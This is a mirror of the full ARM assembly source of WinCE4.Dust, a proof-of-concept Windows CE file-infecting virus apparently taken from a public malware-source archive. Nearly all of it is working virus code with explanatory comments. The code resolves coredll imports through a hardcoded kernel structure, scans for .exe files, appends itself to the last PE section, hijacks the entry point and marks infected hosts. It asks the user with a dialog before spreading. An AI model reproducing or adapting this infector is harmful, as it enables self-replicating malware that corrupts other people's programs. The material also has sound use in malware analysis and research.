mirror of
https://github.com/vxunderground/MalwareSourceCode.git
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685 lines
22 KiB
Plaintext
685 lines
22 KiB
Plaintext
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** virus_source **
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CODE32
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EXPORT WinMainCRTStartup
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AREA .text, CODE, ARM
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virus_start
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; r11 - base pointer
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virus_code_start PROC
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stmdb sp!, {r0 - r12, lr, pc}
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mov r11, sp
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sub sp, sp, #56 ; make space on the stack
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; our stack space gets filled the following way
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; #-56 - udiv
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; #-52 - malloc
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; #-48 - free
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; [r11, #-44] - CreateFileForMappingW
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; #-40 - CloseHandle
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; #-36 - CreateFileMappingW
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; #-32 - MapViewOfFile
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; #-28 - UnmapViewOfFile
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; #-24 - FindFirstFileW
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; #-20 - FindNextFileW
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; #-16 - FindClose
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; #-12 - MessageBoxW
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; #- 8 - filehandle
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; #- 4 - mapping handle
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bl get_export_section
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; we'll import via ordinals, not function names, because it's
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; safe - even linker does that
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adr r2, import_ordinals
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mov r3, sp
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bl lookup_imports
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;
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bl ask_user
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beq jmp_to_host ; are we allowed to spread?
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;
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mov r0, #0x23, 28
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mov lr, pc
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ldr pc, [r11, #-52] ; allocate WFD
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mov r4, r0
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cmp r0, #0
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beq jmp_to_host
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; in the following code I use functions FindFirstFile/FindNextFile
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; for finding *.exe files in the current directory. But in this
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; case I made a big mistake. I didn't realize that WinCE is not
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; aware of the current directory and thus we need to use absolute
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; pathnames. That's why this code won't find files in the current
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; directory, but rather always in root directory. I found this out when I
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; was performing final tests, but because the aim was to create a
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; proof-of-concept code and because the infection itself was already
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; limited by the user's permission, I decided not to correct this
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; bug
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adr r0, mask
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mov r1, r4
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mov lr, pc
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ldr pc, [r11, #-24] ; find first file
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cmn r0, #1
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beq free_wfd
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mov r5, r0
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find_files_iterate
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ldr r0, [r4, #28] ; filesize high
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ldr r1, [r4, #32] ; filesize low
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cmp r0, #0 ; file too big?
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bne find_next_file
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cmp r1, #0x1000 ; file smaller than 4096 bytes?
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addgt r0, r4, #40 ; gimme file name
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blgt infect_file
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find_next_file
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mov r0, r5
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mov r1, r4
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mov lr, pc
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ldr pc, [r11, #-20] ; find next file
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cmp r0, #0 ; is there any left?
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bne find_files_iterate
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mov r0, r5
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mov lr, pc
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ldr pc, [r11, #-16]
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free_wfd
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mov r0, r4
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mov lr, pc
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ldr pc, [r11, #-48] ; free WFD
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;
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jmp_to_host
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adr r0, host_ep
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ldr r1, [r0] ; get host_entry
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ldr r2, [r11, #56] ; get pc
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add r1, r1, r2 ; add displacement
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str r1, [r11, #56] ; store it back
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mov sp, r11
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ldmia sp!, {r0 - r12, lr, pc}
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ENDP
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; we're looking for *.exe files
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mask DCB "*", 0x0, ".", 0x0, "e", 0x0, "x", 0x0, "e", 0x0, 0x0, 0x0
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; host entry point displacement
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; in first generation let compiler count it
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host_ep
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DCD host_entry - virus_code_start - 8
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; WinCE is a UNICODE-only platform and thus we'll use the W ending
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; for api names (there are no ANSI versions of these)
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import_ordinals
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DCW 2008 ; udiv
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DCW 1041 ; malloc
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DCW 1018 ; free
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DCW 1167 ; CreateFileForMappingW
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DCW 553 ; CloseHandle
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DCW 548 ; CreateFileMappingW
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DCW 549 ; MapViewOfFile
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DCW 550 ; UnmapViewOfFile
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DCW 167 ; FindFirstFileW
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DCW 181 ; FindNextFile
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DCW 180 ; FindClose
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DCW 858 ; MessageBoxW
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DCD 0x0
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; basic wide string compare
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wstrcmp PROC
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wstrcmp_iterate
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ldrh r2, [r0], #2
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ldrh r3, [r1], #2
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cmp r2, #0
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cmpeq r3, #0
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moveq pc, lr
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cmp r2, r3
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beq wstrcmp_iterate
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mov pc, lr
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ENDP
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; on theWin32 platform, almost all important functions were located in the
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; kernel32.dll library (and if they weren't, the LoadLibrary/GetProcAddresss pair
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; was). The first infectors had a hardcoded imagebase of this dll and
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; later they imported needed functions by hand from it. This
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; turned out to be incompatible because different Windows versions might
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; have different imagebases for kernel32. That's why more or less
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; sophisticated methods were found that allowed coding in a
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; compatible way. One of these methods is scanning memory for known values
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; located in PE file header ("MZ") if the address inside the module is
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; given. Because the function inside kernel32 calls the EntryPoint of
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; every Win32 process, we've got this address. Then comparing the word
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; on and aligned address (and decrementing it) against known values is
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; enough to locate the imagebase. If this routine is even covered
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; with SEH (Structured Exception Handling) everything is safe.
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; I wanted to use this method on WinCE too, but I hit the wall.
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; Probably to save memory space, there are no headers
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; before the first section of the loaded module. There is thus no
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; "MZ" value and scanning cannot be used even we have the address
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; inside coredll.dll (lr registr on our entrypoint). Moreover, we
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; cannot use SEH either, because SEH handlers get installed with
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; the help of a special directory (the exception directory) in the PE file and
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; some data before the function starts - this information would have
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; to be added while infecting the victim (the exception directory
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; would have to be altered) which is of course not impossible -- just
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; a little bit impractical to implement in our basic virus.
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; That's why I was forced to use a different approach. I looked
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; through the Windows CE 3.0 source code (shared source,
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; downloadable from Microsoft) and tried to find out how the loader
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; performs its task. The Loader needs the pointer to the module's export
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; section and its imagebase to be able to import from it. The result was a
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; KDataStruct at a hardcoded address accessible from user mode (why Microsoft
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; chose to open this loophole, I don't know)
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; and mainly it's item aInfo[KINX_MODULES] which is a pointer to a
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; list of Module structures. There we can find all needed values
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; (name of the module, imagebase and export section RVA). In the
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; code that follows I go through this one-way list and look for
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; structure describing the coredll.dll module. From this structure I
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; get the imagebase and export section RVA (Relative Virtual Address).
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; what sounds relatively easy was in the end more work than I
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; expected. The problem was to get the offsets in the Module
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; structure. The source code and corresponding headers I had were for
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; Windows CE 3.0, but I was writing for Windows CE 4.2 (Windows Mobile 2003),
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; where the structure is different. I worked it out using the following
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; sequence:
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; I was able to get the imagebase offset using the trial-and-error
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; method - I used the debugger and tried values inside the
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; structure that looked like valid pointers. If there was something
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; interesting, I did some memory sniffing to realize where I was.
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; The export section pointer was more difficult. There is no real
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; pointer, just the RVA instead. Adding the imagebase to RVA gives us the
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; pointer. That's why I found coredll.dll in memory - namely the
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; list of function names in export section that the library exports.
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; This list is just a series of ASCIIZ names (you can see this list
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; when opening the dll in your favourite hex editor). At the
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; beginning of this list there must be a dll name (in this case
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; coredll.dll) to which a RVA in the export section header
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; points. Substracting the imagebase from the address where the dll
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; name starts gave me an RVA of the dll name. I did a simple byte
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; search for the byte sequence that together made this RVA value. This
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; showed me where the (Export Directory Table).Name Rva is.
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; Because this is a known offset within a known structure (which is
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; in the beginning of export section), I was able to get
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; the export section pointer this way. I again substracted the imagebase to
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; get the export section RVA. I looked up this value in the coredll's
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; Module structure, which finally gave me the export section RVA
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; offset.
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; this works on Pocket PC 2003; it works on
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; my wince 4.20.0 (build 13252).
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; On different versions the structure offsets might be different :-/
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; output:
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; r0 - coredll base addr
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; r1 - export section addr
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get_export_section PROC
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stmdb sp!, {r4 - r9, lr}
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ldr r4, =0xffffc800 ; KDataStruct
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ldr r5, =0x324 ; aInfo[KINX_MODULES]
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add r5, r4, r5
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ldr r5, [r5]
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; r5 now points to first module
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mov r6, r5
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mov r7, #0
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iterate
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ldr r0, [r6, #8] ; get dll name
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adr r1, coredll
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bl wstrcmp ; compare with coredll.dll
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ldreq r7, [r6, #0x7c] ; get dll base
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ldreq r8, [r6, #0x8c] ; get export section rva
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add r9, r7, r8
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beq got_coredllbase ; is it what we're looking for?
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ldr r6, [r6, #4]
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cmp r6, #0
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cmpne r6, r5
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bne iterate ; nope, go on
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got_coredllbase
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mov r0, r7
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add r1, r8, r7 ; yep, we've got imagebase
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; and export section pointer
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ldmia sp!, {r4 - r9, pc}
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ENDP
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coredll DCB "c", 0x0, "o", 0x0, "r", 0x0, "e", 0x0, "d", 0x0, "l", 0x0, "l", 0x0
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DCB ".", 0x0, "d", 0x0, "l", 0x0, "l", 0x0, 0x0, 0x0
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; r0 - coredll base addr
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; r1 - export section addr
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; r2 - import ordinals array
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; r3 - where to store function adrs
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lookup_imports PROC
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stmdb sp!, {r4 - r6, lr}
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ldr r4, [r1, #0x10] ; gimme ordinal base
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ldr r5, [r1, #0x1c] ; gimme Export Address Table
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add r5, r5, r0
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lookup_imports_iterate
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ldrh r6, [r2], #2 ; gimme ordinal
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cmp r6, #0 ; last value?
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subne r6, r6, r4 ; substract ordinal base
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ldrne r6, [r5, r6, LSL #2] ; gimme export RVA
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addne r6, r6, r0 ; add imagebase
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strne r6, [r3], #4 ; store function address
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bne lookup_imports_iterate
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ldmia sp!, {r4 - r6, pc}
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ENDP
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; r0 - filename
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; r1 - filesize
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infect_file PROC
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stmdb sp!, {r0, r1, r4, r5, lr}
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mov r4, r1
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mov r8, r0
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bl open_file ; first open the file for mapping
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cmn r0, #1
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beq infect_file_end
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str r0, [r11, #-8] ; store the handle
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mov r0, r4 ; now create the mapping with
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; maximum size == filesize
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bl create_mapping
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cmp r0, #0
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beq infect_file_end_close_file
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str r0, [r11, #-4] ; store the handle
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mov r0, r4
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bl map_file ; map the whole file
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cmp r0, #0
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beq infect_file_end_close_mapping
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mov r5, r0
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bl check_header ; is it file that we can infect?
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bne infect_file_end_unmap_view
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ldr r0, [r2, #0x4c] ; check the reserved field in
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; optional header against
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ldr r1, =0x72617461 ; rata
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cmp r0, r1 ; already infected?
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beq infect_file_end_unmap_view
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ldr r1, [r2, #0x3c] ; gimme filealignment
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adr r0, virus_start
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adr r2, virus_end ; compute virus size
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sub r0, r2, r0
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mov r7, r0 ; r7 now holds virus_size
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add r0, r0, r4
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bl _align_ ; add it to filesize and
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mov r6, r0 ; align it to filealignment
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; r6 holds the new filesize
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mov r0, r5
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mov lr, pc
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ldr pc, [r11, #-28] ; UnmapViewOfFile
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ldr r0, [r11, #-4]
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mov lr, pc
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ldr pc, [r11, #-40] ; close mapping handle
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;
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mov r0, r8
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bl open_file ; reopen the file because via
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; closing the mapping handle file
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; handle was closed too
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cmn r0, #1
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beq infect_file_end
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str r0, [r11, #-8]
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mov r0, r6 ; create mapping again with the
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bl create_mapping ; new filesize (with virus appended)
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cmp r0, #0
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beq infect_file_end_close_file
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str r0, [r11, #-4]
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mov r0, r6
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bl map_file ; map it
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cmp r0, #0
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beq infect_file_end_close_mapping
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mov r5, r0
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;
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; r5 - mapping base
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; r7 - virus_size
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ldr r4, [r5, #0x3c] ; get PE signature offset
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add r4, r4, r5 ; add the base
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ldrh r1, [r4, #6] ; get NumberOfSections
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sub r1, r1, #1 ; we want the last section header
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; so dec
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mov r2, #0x28 ; multiply with section header size
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mul r0, r1, r2
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add r0, r0, r4 ; add optional header start to displacement
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add r0, r0, #0x78 ; add optional header size
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ldr r1, [r4, #0x74] ; get number of data directories
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mov r1, r1, LSL #3 ; multiply with sizeof(data_directory)
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add r0, r0, r1 ; add it because section headers
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; start after the optional header
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; (including data directories)
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ldr r6, [r4, #0x28] ; gimme entrypoint rva
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ldr r1, [r0, #0x10] ; get last section's size of rawdata
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ldr r2, [r0, #0x14] ; and pointer to rawdata
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mov r3, r1
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add r1, r1, r2 ; compute pointer to the first
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; byte available for us in the
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; last section
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; (pointer to rawdata + sizeof rawdata)
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mov r9, r1 ; r9 now holds the pointer
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ldr r8, [r0, #0xc] ; get RVA of section start
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add r3, r3, r8 ; add sizeof rawdata
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str r3, [r4, #0x28] ; set entrypoint
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sub r6, r6, r3 ; now compute the displacement so that
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; we can later jump back to the host
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sub r6, r6, #8 ; sub 8 because pc points to
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|
; fetched instruction (viz LTORG)
|
||
|
|
||
|
mov r10, r0
|
||
|
ldr r0, [r10, #0x10] ; get size of raw data again
|
||
|
add r0, r0, r7 ; add virus size
|
||
|
ldr r1, [r4, #0x3c]
|
||
|
bl _align_ ; and align
|
||
|
|
||
|
str r0, [r10, #0x10] ; store new size of rawdata
|
||
|
str r0, [r10, #0x8] ; store new virtual size
|
||
|
|
||
|
ldr r1, [r10, #0xc] ; get virtual address of last section
|
||
|
add r0, r0, r1 ; add size so get whole image size
|
||
|
str r0, [r4, #0x50] ; and store it
|
||
|
|
||
|
ldr r0, =0x60000020 ; IMAGE_SCN_CNT_CODE | MAGE_SCN_MEM_EXECUTE |
|
||
|
; IMAGE_SCN_MEM_READ
|
||
|
ldr r1, [r10, #0x24] ; get old section flags
|
||
|
orr r0, r1, r0 ; or it with our needed ones
|
||
|
str r0, [r10, #0x24] ; store new flags
|
||
|
|
||
|
ldr r0, =0x72617461
|
||
|
str r0, [r4, #0x4c] ; store our infection mark
|
||
|
|
||
|
add r1, r9, r5 ; now we'll copy virus body
|
||
|
mov r9, r1 ; to space prepared in last section
|
||
|
adr r0, virus_start
|
||
|
mov r2, r7
|
||
|
bl simple_memcpy
|
||
|
|
||
|
adr r0, host_ep ; compute number of bytes between
|
||
|
; virus start and host ep
|
||
|
adr r1, virus_start
|
||
|
sub r0, r0, r1 ; because we'll store new host_ep
|
||
|
str r6, [r0, r9] ; in the copied virus body
|
||
|
|
||
|
infect_file_end_unmap_view
|
||
|
mov r0, r5
|
||
|
mov lr, pc ; unmap the view
|
||
|
ldr pc, [r11, #-28]
|
||
|
infect_file_end_close_mapping
|
||
|
ldr r0, [r11, #-4]
|
||
|
mov lr, pc ; close the mapping
|
||
|
ldr pc, [r11, #-40]
|
||
|
infect_file_end_close_file
|
||
|
ldr r0, [r11, #-8]
|
||
|
mov lr, pc ; close file handle
|
||
|
ldr pc, [r11, #-40]
|
||
|
infect_file_end
|
||
|
ldmia sp!, {r0, r1, r4, r5, pc} ; and return
|
||
|
ENDP
|
||
|
|
||
|
; a little reminiscence of my beloved book - Greg Egan's Permutation City
|
||
|
DCB "This code arose from the dust of Permutation City"
|
||
|
ALIGN 4
|
||
|
|
||
|
|
||
|
; this function checks whether the file we want to infect is
|
||
|
; suitable
|
||
|
check_header PROC
|
||
|
ldrh r0, [r5]
|
||
|
ldr r1, =0x5a4d ; MZ?
|
||
|
cmp r0, r1
|
||
|
bne infect_file_end_close_mapping
|
||
|
|
||
|
ldr r2, [r5, #0x3c]
|
||
|
add r2, r2, r5
|
||
|
|
||
|
ldrh r0, [r2]
|
||
|
ldr r1, =0x4550 ; Signature == PE?
|
||
|
cmp r0, r1
|
||
|
bne check_header_end
|
||
|
|
||
|
ldrh r0, [r2, #4]
|
||
|
ldr r1, =0x1c0 ; Machine == ARM?
|
||
|
cmp r0, r1
|
||
|
bne check_header_end
|
||
|
|
||
|
ldrh r0, [r2, #0x5C] ; IMAGE_SUBSYSTEM_WINDOWS_CE_GUI ?
|
||
|
cmp r0, #9
|
||
|
bne check_header_end
|
||
|
|
||
|
ldrh r0, [r2, #0x40]
|
||
|
cmp r0, #4 ; windows ce 4?
|
||
|
|
||
|
check_header_end
|
||
|
mov pc, lr
|
||
|
ENDP
|
||
|
|
||
|
; r0 - file
|
||
|
open_file PROC
|
||
|
str lr, [sp, #-4]!
|
||
|
|
||
|
sub sp, sp, #0xc
|
||
|
mov r1, #3
|
||
|
str r1, [sp] ; OPEN_EXISTING
|
||
|
mov r3, #0
|
||
|
mov r2, #0
|
||
|
str r3, [sp, #8]
|
||
|
str r3, [sp, #4]
|
||
|
mov r1, #3, 2 ; GENERIC_READ | GENERIC_WRITE
|
||
|
mov lr, pc
|
||
|
ldr pc, [r11, #-44] ; call CreateFileForMappingW to
|
||
|
; get the handle suitable for
|
||
|
; CreateFileMapping API
|
||
|
; (on Win32 calling CreateFile is enough)
|
||
|
add sp, sp, #0xc
|
||
|
|
||
|
ldr pc, [sp], #4
|
||
|
ENDP
|
||
|
|
||
|
; r0 - max size low
|
||
|
create_mapping PROC
|
||
|
str lr, [sp, #-4]!
|
||
|
|
||
|
mov r1, #0
|
||
|
sub sp, sp, #8
|
||
|
str r0, [sp]
|
||
|
str r1, [sp, #4]
|
||
|
mov r2, #4 ; PAGE_READWRITE
|
||
|
mov r3, #0
|
||
|
ldr r0, [r11, #-8]
|
||
|
mov lr, pc
|
||
|
ldr pc, [r11, #-36]
|
||
|
add sp, sp, #8
|
||
|
|
||
|
ldr pc, [sp], #4
|
||
|
ENDP
|
||
|
|
||
|
; r0 - bytes to map
|
||
|
map_file PROC
|
||
|
str lr, [sp, #-4]!
|
||
|
|
||
|
sub sp, sp, #4
|
||
|
str r0, [sp]
|
||
|
ldr r0, [r11, #-4]
|
||
|
mov r1, #6 ; FILE_MAP_READ or FILE_MAP_WRITE
|
||
|
mov r2, #0
|
||
|
mov r3, #0
|
||
|
mov lr, pc
|
||
|
ldr pc, [r11, #-32]
|
||
|
add sp, sp, #4
|
||
|
|
||
|
ldr pc, [sp], #4
|
||
|
ENDP
|
||
|
|
||
|
|
||
|
; not optimized (thus simple) mem copy
|
||
|
; r0 - src
|
||
|
; r1 - dst
|
||
|
; r2 - how much
|
||
|
simple_memcpy PROC
|
||
|
ldr r3, [r0], #4
|
||
|
str r3, [r1], #4
|
||
|
subs r2, r2, #4
|
||
|
bne simple_memcpy
|
||
|
mov pc, lr
|
||
|
ENDP
|
||
|
|
||
|
|
||
|
; (r1 - (r1 % r0)) + r0
|
||
|
; r0 - number to align
|
||
|
; r1 - align to what
|
||
|
_align_ PROC
|
||
|
stmdb sp!, {r4, r5, lr}
|
||
|
|
||
|
mov r4, r0
|
||
|
mov r5, r1
|
||
|
|
||
|
mov r0, r1
|
||
|
mov r1, r4
|
||
|
|
||
|
; ARM ISA doesn't have the div instruction so we'll have to call
|
||
|
; the coredll's div implementation
|
||
|
|
||
|
mov lr, pc
|
||
|
ldr pc, [r11, #-56] ; udiv
|
||
|
|
||
|
sub r1, r5, r1
|
||
|
add r0, r4, r1
|
||
|
|
||
|
ldmia sp!, {r4, r5, pc}
|
||
|
ENDP
|
||
|
|
||
|
; this function will ask user (via a MessageBox) whether we're
|
||
|
; allowed to spread or not
|
||
|
ask_user PROC
|
||
|
str lr, [sp, #-4]!
|
||
|
|
||
|
mov r0, #0
|
||
|
adr r1, text
|
||
|
adr r2, caption
|
||
|
mov r3, #4
|
||
|
|
||
|
mov lr, pc
|
||
|
ldr pc, [r11, #-12]
|
||
|
|
||
|
cmp r0, #7
|
||
|
|
||
|
ldr pc, [sp], #4
|
||
|
ENDP
|
||
|
|
||
|
; notice that the strings are encoded in UNICODE
|
||
|
|
||
|
; WinCE4.Dust by Ratter/29A
|
||
|
caption DCB "W", 0x0, "i", 0x0, "n", 0x0, "C", 0x0, "E", 0x0, "4", 0x0
|
||
|
DCB ".", 0x0, "D", 0x0, "u", 0x0, "s", 0x0, "t", 0x0, " ", 0x0
|
||
|
DCB "b", 0x0, "y", 0x0, " ", 0x0, "R", 0x0, "a", 0x0, "t", 0x0
|
||
|
DCB "t", 0x0, "e", 0x0, "r", 0x0, "/", 0x0, "2", 0x0, "9", 0x0
|
||
|
DCB "A", 0x0, 0x0, 0x0
|
||
|
|
||
|
ALIGN 4
|
||
|
|
||
|
; Dear User, am I allowed to spread?
|
||
|
|
||
|
text DCB "D", 0x0, "e", 0x0, "a", 0x0, "r", 0x0, " ", 0x0, "U", 0x0
|
||
|
DCB "s", 0x0, "e", 0x0, "r", 0x0, ",", 0x0, " ", 0x0, "a", 0x0
|
||
|
DCB "m", 0x0, " ", 0x0, "I", 0x0, " ", 0x0, "a", 0x0, "l", 0x0
|
||
|
DCB "l", 0x0, "o", 0x0, "w", 0x0, "e", 0x0, "d", 0x0, " ", 0x0
|
||
|
DCB "t", 0x0, "o", 0x0, " ", 0x0, "s", 0x0, "p", 0x0, "r", 0x0
|
||
|
DCB "e", 0x0, "a", 0x0, "d", 0x0, "?", 0x0, 0x0, 0x0
|
||
|
ALIGN 4
|
||
|
|
||
|
; Just a little greeting to AV firms :-)
|
||
|
|
||
|
DCB "This is proof of concept code. Also, i wanted to make avers happy."
|
||
|
DCB "The situation when Pocket PC antiviruses detect only EICAR file had"
|
||
|
DCB " to end ..."
|
||
|
ALIGN 4
|
||
|
|
||
|
; LTORG is a very important pseudo instruction, which places the
|
||
|
; literal pool "at" the place of its presence. Because the ARM
|
||
|
; instruction length is hardcoded to 32 bits, it is not possible in
|
||
|
; one instruction to load the whole 32bit range into a register (there
|
||
|
; have to be bits to specify the opcode). That's why the literal
|
||
|
; pool was introduced, which in fact is just an array of 32bit values
|
||
|
; that are not possible to load. This data structure is later
|
||
|
; accessed with the aid of the PC (program counter) register that points
|
||
|
; to the currently executed instruction + 8 (+ 8 because ARM processors
|
||
|
; implement a 3 phase pipeline: execute, decode, fetch and the PC
|
||
|
; points not at the instruction being executed but at the instruction being
|
||
|
; fetched). An offset is added to PC so that the final pointer
|
||
|
; points to the right value in the literal pool.
|
||
|
|
||
|
; the pseudo instruction ldr rX, =<value> while compiling gets
|
||
|
; transformed to a mov instruction (if the value is in the range of
|
||
|
; valid values) or it allocates its place in the literal pool and becomes a
|
||
|
; ldr, rX, [pc, #<offset>]
|
||
|
; similarly adr and adrl instructions serve to loading addresses
|
||
|
; to register.
|
||
|
|
||
|
; this approach's advantage is that with minimal effort we can get
|
||
|
; position independent code from the compiler which allows our
|
||
|
; code to run wherever in the address space the loader will load us.
|
||
|
|
||
|
LTORG
|
||
|
virus_end
|
||
|
|
||
|
; the code after virus_end doesn't get copied to victims
|
||
|
|
||
|
WinMainCRTStartup PROC
|
||
|
b virus_code_start
|
||
|
ENDP
|
||
|
|
||
|
; first generation entry point
|
||
|
host_entry
|
||
|
mvn r0, #0
|
||
|
mov pc, lr
|
||
|
END
|
||
|
** virus_source_end **
|